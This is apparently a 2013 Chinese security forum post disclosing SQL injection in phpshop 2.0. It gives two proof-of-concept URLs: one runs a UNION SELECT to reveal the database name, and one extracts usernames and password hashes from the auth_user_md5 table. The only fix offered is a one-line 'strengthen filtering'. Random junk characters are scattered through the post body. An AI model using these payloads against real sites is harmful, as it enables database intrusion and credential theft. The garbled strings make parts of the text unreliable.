找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2074|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability' r. h0 W& s7 @

$ ?/ N, t  Z! S1 i作者 : By onestree
3 z& J) {& X$ ^4 F" ]4 T6 j下载地址 : http://code.google.com/p/phpshop/downloads/list
; X/ c8 V' H- b) l* t测试地址: windows 7 / ubuntu! |1 u( _' v# C- E5 G7 ]/ p* J
% H7 b: x6 B. Q2 y; w4 J

: q8 n% A/ B- u+ P. ^, hSQLi p0c:
4 z& W) p) I8 k: T3 c
* o4 {6 V; i4 i6 X% {. C9 @. g==================; L, V# F% e9 C% K; c# i
% H, u6 ^$ k! Z* ~
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'$ u: Q, z( N* s. f) y) V
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --% _! ?) c' Q8 Q! S* g5 Q
( R5 a6 v7 Y; I) J! v" e7 ?# N5 P
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
. q7 G: }& L1 C9 n. w" O8 a  m, X# c
修复:0 D1 ~2 G2 j9 F/ V/ i
加强过滤+ i! N4 O( |  x8 ~0 u4 d& n2 A

/ ]% L+ c  M4 F! p4 ?( I) A. o6 d5 r  @4 d6 C: D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表